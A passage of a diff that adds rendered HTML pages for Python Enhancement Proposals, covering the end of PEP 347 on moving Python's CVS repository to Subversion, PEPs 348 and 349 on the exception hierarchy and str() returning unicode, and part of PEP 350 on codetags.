+  svn mkdir -m"Conversion to SVN" file:///`pwd`/py.new/$b
+  svnadmin load -q --parent-dir $b py.new < cvs2svn-dump
+  rm cvs2svn-dump
+done
+
+
+

Sample results of this conversion are available at

+
+
+
+
+

Publish the Repository

+

The repository should be published at http://svn.python.org/projects. +Read-write access should be granted to all current SF committers +through svn+ssh://pythondev@svn.python.org/; +read-only anonymous access through WebDAV should also be +granted.

+

As an option, websvn (available e.g. from the Debian websvn package) +could be provided. Unfortunately, in the test installation, websvn +breaks because it runs out of memory.

+

The current SF project admins should get write access to the +authorized_keys2 file of the pythondev account.

+
+
+

Disable CVS

+

It appears that CVS cannot be disabled entirely. Only the user +interface can be removed from the project page; the repository itself +remains available. If desired, write access to the python and +distutils modules can be disabled through a CVS commitinfo entry.

+
+
+
+

Discussion

+

Several alternatives had been suggested to the procedure above. +The rejected alternatives are briefly discussed here:

+
    +
  • create multiple repositories, one for python and one for +distutils. This would have allowed even shorter URLs, but +was rejected because a single repository supports moving code +across projects.
  • +
  • Several people suggested to create the project/trunk structure +through standard cvs2svn, followed by renames. This would have +the disadvantage that old revisions use different path names +than recent revisions; the suggested approach through dump files +works without renames.
  • +
  • Several people also expressed concern about the administrative +overhead that hosting the repository on python.org would cause +to pydotorg admins. As a specific alternative, BerliOS has been +suggested. The pydotorg admins themselves haven't objected +to the additional workload; migrating the repository again if +they get overworked is an option.
  • +
  • Different authentication strategies were discussed. As +alternatives to svn+ssh were suggested
      +
    • Subversion over WebDAV, using SSL and basic authentication, +with pydotorg-generated passwords mailed to the user. People +did not like that approach, since they would need to store +the password on disk (because they can’t remember it); this +is a security risk.
    • +
    • Subversion over WebDAV, using SSL client certificates. This would +work, but would require us to administer a certificate authority.
    • +
    +
  • +
  • Instead of hosting this on python.org, people suggested hosting +it elsewhere. One issue is whether this alternative should be +free or commercial; several people suggested it should better +be commercial, to reduce the load on the volunteers. In +particular:
      +
    • Greg Stein suggested http://www.wush.net/subversion.php. They +offer 5 GB for $90/month, with 200 GB download/month. +The data is on a RAID drive and fully backed up. Anonymous +access and email commit notifications are supported. wush.net +elaborated the following details:
        +
      • The machine would be a Virtuozzo Virtual Private Server (VPS), +hosted at PowerVPS.
      • +
      • The default repository URL would be http://python.wush.net/svn/projectname/, +but anything else could be arranged
      • +
      • we would get SSH login to the machine, with sudo capabilities.
      • +
      • They have a Web interface for management of the various SVN +repositories that we want to host, and to manage user accounts. +While svn+ssh would be supported, the user interface does not +yet support it.
      • +
      • For offsite mirroring/backup, they suggest to use rsync +instead of download of repository tarballs.
      • +
      +

      Bob Ippolito reported that they had used wush.net for a +commercial project for about 6 months, after which time they +left wush.net, because the service was down for three days, +with nobody reachable, and no explanation when it came back.

      +
    • +
    +
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0347.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0348/index.html b/pep-0348/index.html new file mode 100644 index 00000000000..defd347e646 --- /dev/null +++ b/pep-0348/index.html @@ -0,0 +1,646 @@ + + + + + + + + PEP 348 – Exception Reorganization for Python 3.0 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 348 – Exception Reorganization for Python 3.0

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
28-Jul-2005
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been rejected [16].

+
+
+

Abstract

+

Python, as of version 2.4, has 38 exceptions (including warnings) in +the built-in namespace in a rather shallow hierarchy. These +classes have come about over the years without a chance to learn from +experience. This PEP proposes doing a reorganization of the hierarchy +for Python 3.0 when backwards-compatibility is not as much of an +issue.

+

Along with this reorganization, adding a requirement that all +objects passed to a raise statement must inherit from a specific +superclass is proposed. This is to have guarantees about the basic +interface of exceptions and to further enhance the natural hierarchy +of exceptions.

+

Lastly, bare except clauses will be changed to be semantically +equivalent to except Exception. Most people currently use bare +except clause for this purpose and with the exception hierarchy +reorganization becomes a viable default.

+
+
+

Rationale For Wanting Change

+

Exceptions are a critical part of Python. While exceptions are +traditionally used to signal errors in a program, they have also grown +to be used for flow control for things such as iterators.

+

While their importance is great, there is a lack of structure to them. +This stems from the fact that any object can be raised as an +exception. Because of this you have no guarantee in terms of what +kind of object will be raised, destroying any possible hierarchy +raised objects might adhere to.

+

But exceptions do have a hierarchy, showing the severity of the +exception. The hierarchy also groups related exceptions together to +simplify catching them in except clauses. To allow people to +rely on this hierarchy, a common superclass that all +raised objects must inherit from is being proposed. It also allows +guarantees about the interface to raised objects to be made (see +PEP 344). A discussion about all of this has occurred +before on python-dev [1].

+

As bare except clauses stand now, they catch all exceptions. +While this can be handy, it is rather overreaching for the common +case. Thanks to having a required superclass, catching all +exceptions is as easy as catching just one specific exception. +This allows bare except clauses to be used for a more useful +purpose. +Once again, this has been discussed on python-dev [2].

+

Finally, slight changes to the exception hierarchy will make it much +more reasonable in terms of structure. With minor rearranging, +exceptions that should not typically be caught can be allowed to propagate to the +top of the execution stack, terminating the interpreter as intended.

+
+
+

Philosophy of Reorganization

+

For the reorganization of the hierarchy, there was a general +philosophy followed that developed from discussion of earlier drafts +of this PEP [4], [5], +[6], [7], +[8], [9]. +First and foremost was to not break anything +that works. This meant that renaming exceptions was out of the +question unless the name was deemed severely bad. This +also meant no removal of exceptions unless they were viewed as +truly misplaced. New exceptions were only introduced in +situations where there might be a use for catching a superclass of a +category of exceptions. Lastly, existing exceptions would have their +inheritance tree changed only if it was felt they were truly +misplaced to begin with.

+

For all new exceptions, the proper suffix had to be chosen. For +those that signal an error, “Error” is to be used. If the exception +is a warning, then “Warning”. “Exception” is to be used when none +of the other suffixes are proper to use and no specific suffix is +a better fit.

+

After that it came down to choosing which exceptions should and +should not inherit from Exception. This was for the purpose of +making bare except clauses more useful.

+

Lastly, the entire existing hierarchy had to inherit from the new +exception meant to act as the required superclass for all exceptions +to inherit from.

+
+
+

New Hierarchy

+
+

Note

+

Exceptions flagged with “stricter inheritance” will no +longer inherit from a certain class. A “broader inheritance” flag +means a class has been added to the exception’s inheritance tree. +All comparisons are against the Python 2.4 exception hierarchy.

+
+
+-- BaseException (new; broader inheritance for subclasses)
+    +-- Exception
+        +-- GeneratorExit (defined in PEP 342)
+        +-- StandardError
+            +-- ArithmeticError
+                +-- ZeroDivisionError
+                +-- FloatingPointError
+                +-- OverflowError
+            +-- AssertionError
+            +-- AttributeError
+            +-- EnvironmentError
+                +-- IOError
+                +-- OSError
+            +-- EOFError
+            +-- ImportError
+            +-- LookupError
+                +-- IndexError
+                +-- KeyError
+            +-- MemoryError
+            +-- NameError
+                +-- UnboundLocalError
+            +-- NotImplementedError (stricter inheritance)
+            +-- SyntaxError
+                +-- IndentationError
+                    +-- TabError
+            +-- TypeError
+            +-- RuntimeError
+            +-- UnicodeError
+                +-- UnicodeDecodeError
+                +-- UnicodeEncodeError
+                +-- UnicodeTranslateError
+            +-- ValueError
+            +-- ReferenceError
+        +-- StopIteration
+        +-- SystemError
+        +-- Warning
+            +-- DeprecationWarning
+            +-- FutureWarning
+            +-- PendingDeprecationWarning
+            +-- RuntimeWarning
+            +-- SyntaxWarning
+            +-- UserWarning
+        +-- WindowsError
+    +-- KeyboardInterrupt (stricter inheritance)
+    +-- SystemExit (stricter inheritance)
+
+
+

Differences Compared to Python 2.4

+

A more thorough explanation of terms is needed when discussing +inheritance changes. Inheritance changes result in either broader or +more restrictive inheritance. “Broader” is when a class has an +inheritance tree like cls, A and then becomes cls, B, A. +“Stricter” is the reverse.

+
+

BaseException

+

The superclass that all exceptions must inherit from. Its name was +chosen to reflect that it is at the base of the exception hierarchy +while being an exception itself. “Raisable” was considered as a name, +but it was passed over because the name did not properly reflect the fact +that it is an exception itself.

+

Direct inheritance of BaseException is not expected, and will +be discouraged for the general case. Most user-defined +exceptions should inherit from Exception instead. This allows +catching Exception to continue to work in the common case of catching +all exceptions that should be caught. Direct inheritance of +BaseException should only be done in cases where an entirely new +category of exception is desired.

+

But, for cases where all +exceptions should be caught blindly, except BaseException will +work.

+
+
+

KeyboardInterrupt and SystemExit

+

Both exceptions are no longer under Exception. This is to allow bare +except clauses to act as a more viable default case by catching +exceptions that inherit from Exception. With both KeyboardInterrupt +and SystemExit acting as signals that the interpreter is expected to +exit, catching them in the common case is the wrong semantics.
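A sketch of the intended effect (main_loop() and log_error() are placeholder names):

try:
    main_loop()
except Exception:
    log_error()    # ordinary errors are still caught here
# KeyboardInterrupt (Ctrl-C) and SystemExit (sys.exit()) no longer
# match Exception, so they propagate and terminate the interpreter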

+
+
+

NotImplementedError

+

Inherits from Exception instead of from RuntimeError.

+

Originally inheriting from RuntimeError, NotImplementedError does not +have any direct relation to the exception meant for use in user code +as a quick-and-dirty exception. Thus it now directly inherits from +Exception.

+
+
+
+

Required Superclass for raise

+

By requiring all objects passed to a raise statement to inherit +from a specific superclass, all exceptions are guaranteed to have +certain attributes. If PEP 344 is accepted, the attributes +outlined there will be guaranteed to be on all exceptions raised. +This should help facilitate debugging by making the querying of +information from exceptions much easier.

+

The proposed hierarchy has BaseException as the required base class.

+
+

Implementation

+

Enforcement is straightforward. Modifying RAISE_VARARGS to do an +inheritance check first before raising an exception should be enough. +For the C API, all functions that set an exception will have the same +inheritance check applied.
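A sketch of the intended behaviour at the Python level (the exact error raised by a failed check is my assumption):

raise "spam"                 # rejected: a str does not inherit from
                             # BaseException (presumably a TypeError)

class MyError(Exception):    # inherits BaseException via Exception
    pass

raise MyError("accepted")    # passes the inheritance check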

+
+
+
+

Bare except Clauses Catch Exception

+

In most existing Python 2.4 code, bare except clauses are too +broad in the exceptions they catch. Typically only exceptions that +signal an error are desired to be caught. This means that exceptions +that are used to signify that the interpreter should exit should not +be caught in the common case.

+

With KeyboardInterrupt and SystemExit moved to inherit from +BaseException instead of Exception, changing bare except clauses +to act as except Exception becomes a much more reasonable +default. This change also will break very little code since these +semantics are what most people want for bare except clauses.

+

The complete removal of bare except clauses has been argued for. +The case has been made that they violate both Only One Way To Do It +(OOWTDI) and Explicit Is Better Than Implicit (EIBTI) as listed in the +Zen of Python. But Practicality Beats Purity (PBP), also in +the Zen of Python, trumps both of these in this case. The BDFL has +stated that bare except clauses will work this way +[14].

+
+

Implementation

+

The compiler will emit the bytecode for except Exception whenever +a bare except clause is reached.
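In other words, after compilation the two forms below would be indistinguishable (process() and recover() are placeholders):

try:
    process()
except:                # a bare clause...
    recover()

try:
    process()
except Exception:      # ...is compiled as if written like this
    recover()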

+
+
+
+

Transition Plan

+

Because of the complexity and clutter that would be required to add +all features planned in this PEP, the transition plan is very simple. +In Python 2.5 BaseException is added. In Python 3.0, all remaining +features (required superclass, change in inheritance, bare except +clauses becoming the same as except Exception) will go into +effect. Making all of this work in a backwards-compatible +way in Python 2.5 would require very deep hacks in the exception +machinery which could be error-prone and lead to a slowdown in +performance for little benefit.

+

To help with the transition, the documentation will be changed to +reflect several programming guidelines:

+
    +
  • When one wants to catch all exceptions, catch BaseException
  • +
  • To catch all exceptions that do not represent the termination of +the interpreter, catch Exception explicitly
  • +
  • Explicitly catch KeyboardInterrupt and SystemExit; don’t rely on +inheritance from Exception to lead to the capture
  • +
  • Always catch NotImplementedError explicitly instead of relying on +the inheritance from RuntimeError
  • +
+

The documentation for the ‘exceptions’ module [3], +tutorial [15], and PEP 290 will all require +updating.

+
+
+

Rejected Ideas

+
+

DeprecationWarning Inheriting From PendingDeprecationWarning

+

This was originally proposed because a DeprecationWarning can be +viewed as a PendingDeprecationWarning that is being removed in the +next version. But since enough people thought the inheritance could +logically work the other way around, the idea was dropped.

+
+
+

AttributeError Inheriting From TypeError or NameError

+

Viewing attributes as part of the interface of a type caused the idea +of inheriting from TypeError. But that partially defeats the thinking +of duck typing and thus the idea was dropped.

+

Inheriting from NameError was suggested because objects can be viewed +as having their own namespace where the attributes live and when an +attribute is not found it is a namespace failure. This was also +dropped as a possibility since not everyone shared this view.

+
+
+

Removal of EnvironmentError

+

Originally proposed based on the idea that EnvironmentError was an +unneeded distinction, the BDFL overruled this idea [10].

+
+
+

Introduction of MacError and UnixError

+

Proposed to add symmetry to WindowsError, the BDFL said they won’t be +used enough [10]. The idea of then removing WindowsError +was proposed and accepted as reasonable, thus completely negating the +idea of adding these exceptions.

+
+
+

SystemError Subclassing SystemExit

+

Proposed because a SystemError is meant to lead to a system exit, the +idea was removed since CriticalError indicates this better.

+
+
+

ControlFlowException Under Exception

+

It has been suggested that ControlFlowException should inherit from +Exception. This idea has been rejected based on the thinking that +control flow exceptions typically do not all need to be caught by a +single except clause.

+
+
+

Rename NameError to NamespaceError

+

NameError is considered more succinct and leaves open no possible +mistyping of +the capitalization of “Namespace” [11].

+
+

Renaming RuntimeError or Introducing SimpleError

+

The thinking was that RuntimeError was in no way an obvious name for +an exception meant to be used when a situation did not call for the +creation of a new exception. The renaming was rejected on the basis +that the exception is already used throughout the interpreter +[12]. +Rejection of SimpleError was founded on the thought that people +should be free to use whatever exception they choose and not have one +so blatantly suggested [13].

+
+
+
+

Renaming Existing Exceptions

+

Various renamings were suggested but none garnered more than a +0 vote +(renaming ReferenceError to WeakReferenceError). The thinking was +that the existing names were fine and no one had ever actively complained +about them. To minimize backwards-compatibility issues and avoid +causing existing Python programmers extra pain, the renamings were +removed.

+
+
+

Have EOFError Subclass IOError

+

The original thought was that since EOFError deals directly with I/O, +it should +subclass IOError. But since EOFError is used more as a signal that an +event +has occurred (the exhaustion of an I/O port), it should not subclass +such a specific error exception.

+
+
+

Have MemoryError and SystemError Have a Common Superclass

+

Both classes deal with the interpreter, so why not have them have a +common +superclass? Because one of them means that the interpreter is in a +state that it should not recover from while the other does not.

+
+
+

Common Superclass for PendingDeprecationWarning and DeprecationWarning

+

Grouping the deprecation warning exceptions together makes intuitive +sense. +But this sensible idea does not extend well when one considers how +rarely either warning is used, let alone at the same time.

+
+
+

Removing WindowsError

+

Originally proposed based on the idea that having such a +platform-specific exception should not be in the built-in namespace. +It turns out, though, enough code exists that uses the exception to +warrant it staying.

+
+
+

Superclass for KeyboardInterrupt and SystemExit

+

Proposed to make catching non-Exception inheriting exceptions easier +along with easing the transition to the new hierarchy, the idea was +rejected by the BDFL [14]. The argument that existing +code did not show enough instances of the pair of exceptions being +caught and thus did not justify cluttering the built-in namespace +was used.

+
+
+
+

Acknowledgements

+

Thanks to Robert Brewer, Josiah Carlson, Alyssa Coghlan, Timothy +Delaney, Jack Diedrich, Fred L. Drake, Jr., Philip J. Eby, Greg Ewing, +James Y. Knight, MA Lemburg, Guido van Rossum, Stephen J. Turnbull, +Raymond Hettinger, and everyone else I missed for participating in the +discussion.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0348.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0349/index.html b/pep-0349/index.html new file mode 100644 index 00000000000..33273486f0c --- /dev/null +++ b/pep-0349/index.html @@ -0,0 +1,254 @@ + + + + + + + + PEP 349 – Allow str() to return unicode strings | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 349 – Allow str() to return unicode strings

+
+
Author:
+
Neil Schemenauer <nas at arctrix.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
02-Aug-2005
+
Python-Version:
+
2.5
+
Post-History:
+
06-Aug-2005
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to change the str() built-in function so that it +can return unicode strings. This change would make it easier to +write code that works with either string type and would also make +some existing code handle unicode strings. The C function +PyObject_Str() would remain unchanged and the function +PyString_New() would be added instead.

+
+
+

Rationale

+

Python has had a Unicode string type for some time now but use of +it is not yet widespread. There is a large amount of Python code +that assumes that string data is represented as str instances. +The long-term plan for Python is to phase out the str type and use +unicode for all string data. Clearly, a smooth migration path +must be provided.

+

We need to upgrade existing libraries, written for str instances, +to be capable of operating in an all-unicode string world. +We can’t change to an all-unicode world until all essential +libraries are made capable of it. Upgrading the libraries in one +shot does not seem feasible. A more realistic strategy is to +individually make the libraries capable of operating on unicode +strings while preserving their current all-str environment +behaviour.

+

First, we need to be able to write code that can accept unicode +instances without attempting to coerce them to str instances. Let +us label such code as Unicode-safe. Unicode-safe libraries can be +used in an all-unicode world.

+

Second, we need to be able to write code that, when provided only +str instances, will not create unicode results. Let us label such +code as str-stable. Libraries that are str-stable can be used by +libraries and applications that are not yet Unicode-safe.

+

Sometimes it is simple to write code that is both str-stable and +Unicode-safe. For example, the following function just works:

+
def appendx(s):
+    return s + 'x'
+
+
+

That’s not too surprising since the unicode type is designed to +make the task easier. The principle is that when str and unicode +instances meet, the result is a unicode instance. One notable +difficulty arises when code requires a string representation of an +object; an operation traditionally accomplished by using the str() +built-in function.

+

Using the current str() function makes the code not Unicode-safe. +Replacing a str() call with a unicode() call makes the code not +str-stable. Changing str() so that it could return unicode +instances would solve this problem. As a further benefit, some code +that is currently not Unicode-safe because it uses str() would +become Unicode-safe.
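To make the str-stable/Unicode-safe distinction concrete, here is a small sketch of Python 2 string semantics under the proposed str():

def bracket(obj):
    return "<" + str(obj) + ">"

bracket("abc")         # '<abc>' -- str in, str out (str-stable)
bracket(u"caf\xe9")    # u'<caf\xe9>' -- the unicode instance passes
                       # through str() untouched, and mixing it with
                       # the str literals yields unicode (Unicode-safe);
                       # today's str() would instead raise
                       # UnicodeEncodeError coercing to ASCII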

+
+
+

Specification

+

A Python implementation of the str() built-in follows:

+
def str(s):
+    """Return a nice string representation of the object.  The
+    return value is a str or unicode instance.
+    """
+    if type(s) is str or type(s) is unicode:
+        return s
+    r = s.__str__()
+    if not isinstance(r, (str, unicode)):
+        raise TypeError('__str__ returned non-string')
+    return r
+
+
+

The following function would be added to the C API and would be the +equivalent of the str() built-in (ideally it would be called PyObject_Str, +but changing that function could cause a massive number of +compatibility problems):

+
PyObject *PyString_New(PyObject *);
+
+
+

A reference implementation is available on Sourceforge [1] as a +patch.

+
+
+

Backwards Compatibility

+

Some code may require that str() returns a str instance. In the +standard library, only one such case has been found so far. The +function email.header_decode() requires a str instance and the +email.Header.decode_header() function tries to ensure this by +calling str() on its argument. The code was fixed by changing +the line “header = str(header)” to:

+
if isinstance(header, unicode):
+    header = header.encode('ascii')
+
+
+

Whether this is truly a bug is questionable since decode_header() +really operates on byte strings, not character strings. Code that +passes it a unicode instance could itself be considered buggy.

+
+
+

Alternative Solutions

+

A new built-in function could be added instead of changing str(). +Doing so would introduce virtually no backwards compatibility +problems. However, since the compatibility problems are expected to +be rare, changing str() seems preferable to adding a new built-in.

+

The basestring type could be changed to have the proposed behaviour, +rather than changing str(). However, that would be confusing +behaviour for an abstract base type.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0349.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0350/index.html b/pep-0350/index.html new file mode 100644 index 00000000000..265422541ab --- /dev/null +++ b/pep-0350/index.html @@ -0,0 +1,657 @@ + + + + + + + + PEP 350 – Codetags | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 350 – Codetags

+
+
Author:
+
Micah Elliott <mde at tracos.org>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Created:
+
27-Jun-2005
+
Post-History:
+
10-Aug-2005, 26-Sep-2005
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected. While the community may be interested, +there is no desire to make the standard library conform to this standard.

+
+
+

Abstract

+

This informational PEP aims to provide guidelines for consistent use +of codetags, which would enable the construction of standard +utilities to take advantage of the codetag information, as well as +making Python code more uniform across projects. Codetags also +represent a very lightweight programming micro-paradigm and become +useful for project management, documentation, change tracking, and +project health monitoring. This is submitted as a PEP because its +ideas are thought to be Pythonic, although the concepts are not unique +to Python programming. Herein are the definition of codetags, the +philosophy behind them, a motivation for standardized conventions, +some examples, a specification, a toolset description, and possible +objections to the Codetag project/paradigm.

+

This PEP is also living as a wiki for people to add comments.

+
+
+

What Are Codetags?

+

Programmers widely use ad-hoc code comment markup conventions to serve +as reminders of sections of code that need closer inspection or +review. Examples of markup include FIXME, TODO, XXX, +BUG, but there are many more in wide use in existing software. Such +markup will henceforth be referred to as codetags. These codetags +may show up in application code, unit tests, scripts, general +documentation, or wherever suitable.
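For instance, codetags in a Python source file might look like the following (the fielded <...> suffixes follow the specification given later in this PEP; the particular fields shown here are illustrative):

def load_config(path):
    # TODO: Fall back to a system-wide default when path is missing. <p:2>
    # FIXME: Malformed lines are silently ignored. <MDE 2005-09-26>
    pass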

+

Codetags have been under discussion and in use (hundreds of codetags +in the Python 2.4 sources) in many places (e.g., c2) for many years. +See References for further historic and current information.

+
+
+

Philosophy

+

If you subscribe to most of these values, then codetags will likely be +useful for you.

+
  1. As much information as possible should be contained inside the source code (application code or unit tests). This along with use of codetags impedes duplication. Most documentation can be generated from that source code; e.g., by using help2man, man2html, docutils, epydoc/pydoc, ctdoc, etc.
  2. Information should almost never be duplicated – it should be recorded in a single original format and all other locations should be automatically generated from the original, or simply be referenced. This is famously known as the Single Point Of Truth (SPOT) or Don’t Repeat Yourself (DRY) rule.
  3. Documentation that gets into customers’ hands should be auto-generated from single sources into all other output formats. People want documentation in many forms. It is thus important to have a documentation system that can generate all of these.
  4. The developers are the documentation team. They write the code and should know the code the best. There should not be a dedicated, disjoint documentation team for any non-huge project.
  5. Plain text (with non-invasive markup) is the best format for writing anything. All other formats are to be generated from the plain text.
+

Codetag design was influenced by the following goals:

+
  1. Comments should be short whenever possible.
  2. Codetag fields should be optional and of minimal length. Default values and custom fields can be set by individual code shops.
  3. Codetags should be minimalistic. The quicker it is to jot something down, the more likely it is to get jotted.
  4. The most common use of codetags will only have zero to two fields specified, and these should be the easiest to type and read.
+
+
+

Motivation

+
  • Various productivity tools can be built around codetags.

    See Tools.

  • Encourages consistency.

    Historically, a subset of these codetags has been used informally in the majority of source code in existence, whether in Python or in other languages. Tags have been used in an inconsistent manner with different spellings, semantics, format, and placement. For example, some programmers might include datestamps and/or user identifiers, limit to a single line or not, spell the codetag differently than others, etc.

  • Encourages adherence to SPOT/DRY principle.

    E.g., generating a roadmap dynamically from codetags instead of keeping TODOs in sync with a separate roadmap document.

  • Easy to remember.

    All codetags must be concise, intuitive, and semantically non-overlapping with others. The format must also be simple.

  • Use not required/imposed.

    If you don’t use codetags already, there’s no obligation to start, and no risk of affecting code (but see Objections). A small subset can be adopted and the Tools will still be useful (a few codetags have probably already been adopted on an ad-hoc basis anyway). Also it is very easy to identify and remove (and possibly record) a codetag that is no longer deemed useful.

  • Gives a global view of code.

    Tools can be used to generate documentation and reports.

  • A logical location for capturing CRCs/Stories/Requirements.

    The XP community often does not electronically capture Stories, but codetags seem like a good place to locate them.

  • Extremely lightweight process.

    Creating tickets in a tracking system for every thought degrades development velocity. Even if a ticketing system is employed, codetags are useful for simply containing links to those tickets.
+
+
+

Examples

+

This shows a simple codetag as commonly found in sources everywhere +(with the addition of a trailing <>):

+
# FIXME: Seems like this loop should be finite. <>
+while True: ...
+
+
+

The following contrived example demonstrates a typical use of +codetags. It uses some of the available fields to specify the +assignees (a pair of programmers with initials MDE and CLE), the +Date of expected completion (Week 14), and the Priority of the item +(2):

+
# FIXME: Seems like this loop should be finite. <MDE,CLE d:14w p:2>
+while True: ...
+
+
+

This codetag shows a bug with fields describing author, discovery +(origination) date, due date, and priority:

+
# BUG: Crashes if run on Sundays.
+# <MDE 2005-09-04 d:14w p:2>
+if day == 'Sunday': ...
+
+
+

Here is a demonstration of how not to use codetags. This has many +problems: 1) Codetags cannot share a line with code; 2) Missing colon +after mnemonic; 3) A codetag referring to codetags is usually useless, +and worse, it is not completable; 4) No need to have a bunch of fields +for a trivial codetag; 5) Fields with unknown values (t:XXX) +should not be used:

+
i = i + 1   # TODO Add some more codetags.
+# <JRNewbie 2005-04-03 d:2005-09-03 t:XXX d:14w p:0 s:inprogress>
+
+
+
+
+

Specification

+

This describes the format: syntax, mnemonic names, fields, and +semantics, and also the separate DONE File.

+
+

General Syntax

+

Each codetag should be inside a comment, and can be any number of +lines. It should not share a line with code. It should match the +indentation of surrounding code. The end of the codetag is marked by +a pair of angle brackets <> containing optional fields, which must +not be split onto multiple lines. It is preferred to have a codetag +in # comments instead of string comments. There can be multiple +fields per codetag, all of which are optional.

+

In short, a codetag consists of a mnemonic, a colon, commentary text, +an opening angle bracket, an optional list of fields, and a closing +angle bracket. E.g.,

+
# MNEMONIC: Some (maybe multi-line) commentary. <field field ...>
+
+
+
+
+

Mnemonics

+

The codetags of interest are listed below, using the following format:

+
+
recommended mnemonic (& synonym list)
+
+
canonical name: semantics
+
+
+
+
TODO (MILESTONE, MLSTN, DONE, YAGNI, TBD, TOBEDONE)
To do: Informal tasks/features that are pending completion.
+
FIXME (XXX, DEBUG, BROKEN, REFACTOR, REFACT, RFCTR, OOPS, SMELL, NEEDSWORK, INSPECT)
Fix me: Areas of problematic or ugly code needing refactoring or +cleanup.
+
BUG (BUGFIX)
Bugs: Reported defects tracked in bug database.
+
NOBUG (NOFIX, WONTFIX, DONTFIX, NEVERFIX, UNFIXABLE, CANTFIX)
Will Not Be Fixed: Problems that are well-known but will never be +addressed due to design problems or domain limitations.
+
REQ (REQUIREMENT, STORY)
Requirements: Satisfactions of specific, formal requirements.
+
RFE (FEETCH, NYI, FR, FTRQ, FTR)
Requests For Enhancement: Roadmap items not yet implemented.
+
IDEA
Ideas: Possible RFE candidates, but less formal than RFE.
+
??? (QUESTION, QUEST, QSTN, WTF)
Questions: Misunderstood details.
+
!!! (ALERT)
Alerts: In need of immediate attention.
+
HACK (CLEVER, MAGIC)
Hacks: Temporary code to force inflexible functionality, or +simply a test change, or workaround a known problem.
+
PORT (PORTABILITY, WKRD)
Portability: Workarounds specific to OS, Python version, etc.
+
CAVEAT (CAV, CAVT, WARNING, CAUTION)
Caveats: Implementation details/gotchas that stand out as +non-intuitive.
+
NOTE (HELP)
Notes: Sections where a code reviewer found something that needs +discussion or further investigation.
+
FAQ
Frequently Asked Questions: Interesting areas that require +external explanation.
+
GLOSS (GLOSSARY)
Glossary: Definitions for project glossary.
+
SEE (REF, REFERENCE)
See: Pointers to other code, web link, etc.
+
TODOC (DOCDO, DODOC, NEEDSDOC, EXPLAIN, DOCUMENT)
Needs Documentation: Areas of code that still need to be +documented.
+
CRED (CREDIT, THANKS)
Credits: Accreditations for external provision of enlightenment.
+
STAT (STATUS)
Status: File-level statistical indicator of maturity of this +file.
+
RVD (REVIEWED, REVIEW)
Reviewed: File-level indicator that review was conducted.
+
+

File-level codetags might be better suited as properties in the +revision control system, but might still be appropriately specified in +a codetag.

+

Some of these are temporary (e.g., FIXME) while others are +persistent (e.g., REQ). A mnemonic was chosen over a synonym +using three criteria: descriptiveness, length (shorter is better), +commonly used.

+

Choosing between FIXME and XXX is difficult. XXX seems to +be more common, but much less descriptive. Furthermore, XXX is a +useful placeholder in a piece of code having a value that is unknown. +Thus FIXME is the preferred spelling. Sun says that XXX +and FIXME are slightly different, giving XXX higher severity. +However, with decades of chaos on this topic, and too many millions of +developers who won’t be influenced by Sun, it is easy to rightly call +them synonyms.

+

DONE is always a completed TODO item, but this should probably +be indicated through the revision control system and/or a completion +recording mechanism (see DONE File).

+

It may be a useful metric to count NOTE tags: a high count may +indicate a design (or other) problem. But of course the majority of +codetags indicate areas of code needing some attention.

+

An FAQ is probably more appropriately documented in a wiki where +users can more easily view and contribute.

+
+
+

Fields

+

All fields are optional. The proposed standard fields are described +in this section. Note that upper case field characters are intended +to be replaced.

+

The Originator/Assignee and Origination Date/Week fields are the +most common and don’t usually require a prefix.

+

This lengthy list of fields is liable to scare people (the intended +minimalists) away from adopting codetags, but keep in mind that these +only exist to support programmers who either 1) like to keep BUG +or RFE codetags in a complete form, or 2) are using codetags as +their complete and only tracking system. In other words, many of +these fields will be used very rarely. They are gathered largely from +industry-wide conventions, and example sources include GCC +Bugzilla and Python’s SourceForge tracking systems.

+
+
AAA[,BBB]...
List of Originator or Assignee initials (the context +determines which unless both should exist). It is also okay to +use usernames such as MicahE instead of initials. Initials +(in upper case) are the preferred form.
+
a:AAA[,BBB]...
List of Assignee initials. This is necessary only in (rare) cases where a codetag has both an assignee and an originator, and they are different. Otherwise the a: prefix is omitted, and context determines the intent. E.g., FIXME usually has an Assignee, and NOTE usually has an Originator, but if a FIXME was originated (and initialed) by a reviewer, then the assignee’s initials would need an a: prefix.
+
YYYY[-MM[-DD]] or WW[.D]w
The Origination Date indicating when the comment was added, in +ISO 8601 format (digits and hyphens only). Or Origination +Week, an alternative form for specifying an Origination Date. +A day of the week can be optionally specified. The w suffix +is necessary for distinguishing from a date.
+
d:YYYY[-MM[-DD]] or d:WW[.D]w
Due Date (d) target completion (estimate). Or Due Week (d), +an alternative to specifying a Due Date.
+
p:N
Priority (p) level. Range (N) is from 0..3 with 3 being the +highest. 0..3 are analogous to low, medium, high, and +showstopper/critical. The Severity field could be factored into +this single number, and doing so is recommended since having both +is subject to varying interpretation. The range and order should +be customizable. The existence of this field is important for any +tool that itemizes codetags. Thus a (customizable) default value +should be supported.
+
